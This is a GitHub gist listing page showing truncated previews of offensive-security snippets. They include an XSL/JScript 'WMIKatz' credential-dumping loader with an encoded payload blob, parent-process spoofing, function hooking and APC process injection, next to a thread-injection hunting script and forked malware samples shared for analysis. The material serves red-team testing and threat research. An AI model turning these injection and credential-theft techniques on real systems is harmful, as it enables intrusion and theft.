qqvirus
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
qqvirus
/ gist:7d5b2b2fcc29e44e3dedc29310899056
Created
August 21, 2018 06:30
WMIKatz - Are you afraid
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
| <!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
| <xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
| <xsl:strip-space elements="*" /> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| data:application/x-zip-compressed;base64,UEsDBBQAAAAIANKTaUzM9B2HXvQPABwIUAAMAAAAbWltaWthdHoueHNs7F1Jj+U+ET/TUn+HZk6AeiCLEzsIkBCcEJzggMQBsTQwaIb5a2ZYPz21/2wnee/1MHCh1d3peCuXy7W57CTf+8fHt9/9+Omfb58+/unp6dPDP969/cvH71Lm91/96dOnr777ne/8/e9///bf52+///DH74zbtn3nlz//6Xd+8eE3f/n4h/cf3r2yBu8+fv/VXz/85bsff/enp3e/+fj63ZvffXj/8f0fPr3+3ft3DO6T1/zbb7Xmpz89vaac1394Q11Ljdd/+61X+uvHpw/ff/XV29/87ulP79/+/unDq4e/PX34+Ob9X77/avz28OoH93ff+/rr1w8/ev/VPz+8+eOfPj1843fffPiZd0r5H756/+E3n6jBtx8efvj27YPU+vjw4Ykg/+3p999+eP2agBAYHv/7v3766q+fHt49ffrT+99//9Wnp38Quu/fvfkkGP7+6Xdvf0PApPd/Pn189fDmL79/+sun77/6y/tX3yEoRsMPb756/fErQvnh6e3TO6pANPnWq4fvaD/vPhJxqMqnhzfvvrLy1199ePrDm38QQT7yEN/+5i9//Otv/vj0/Vc/+blU1XH+6kc//uEvfvgrhvK1+7u//ebDA9V+85u3b/719Ptfv//tnx++/0CFw+P4OMjPtCz1n+XjJ0XOnB7L/DhO4+M4LvS3Po7DSH/bY1of12Kp8nh/p3fz45a9GrXU8jHR/4VKuCrfEsAJFRku1xoe88S3VmuIxrMhU672KHeUYX1K/5KVCpUR2p5B/5P1NXDhzD90cz5a6rDq/b842jQ/th1Rz11X68YAOMktGOGbJ+pZiN/fPRP1fAGJMllqCkS2rYfMFXOmjr3hVgJ6nrmGAhi/HL23x0m4iwVkC14jlEMYJr8rn03j+7svhe6ePS4yh8whCYYPgfNtCJPOvrZd5K+ |
qqvirus
/ GetSystem.ps1
Created
August 21, 2018 06:30
PowerShell GetSystem => Test for MITRE ATT&CK T 1134
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| $owners = @{} | |
| gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user} | |
| get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}} | |
| #> | |
| #Simple powershell/C# to spawn a process under a different parent process | |
| #Launch PowerShell As Administrator |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| public class FxHook:IDisposable { | |
| const int nBytes = 5; | |
| IntPtr addr; | |
| Protection old; | |
| byte[] src = new byte[5]; |
qqvirus
/ clr_via_native.c
Created
August 21, 2018 06:29
A quick example showing loading CLR via native code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| public class ApcInjectionNewProcess | |
| { | |
| public ApcInjectionNewProcess() |
qqvirus
/ Get-InjectedThread.ps1
Created
April 10, 2018 02:02
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
qqvirus
/ 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
Created
March 26, 2018 06:57
— forked from JohnLaTwC/588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
[uploaded by @JohnLaTwC: VBA from 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f and additional dropped payloads]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| ## sample hash: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f | |
| olevba 0.52dev7 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MASI-B-- 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f | |
| =============================================================================== | |
| FILE: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f | |
| Type: OLE |
qqvirus
/ PDF JS threat
Created
March 26, 2018 06:57
— forked from JohnLaTwC/PDF JS threat
PDF / JS threat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc | |
| %PDF-1.1 | |
| 1 0 obj | |
| << | |
| /Type /Catalog | |
| /Outlines 2 0 R | |
| /Pages 3 0 R |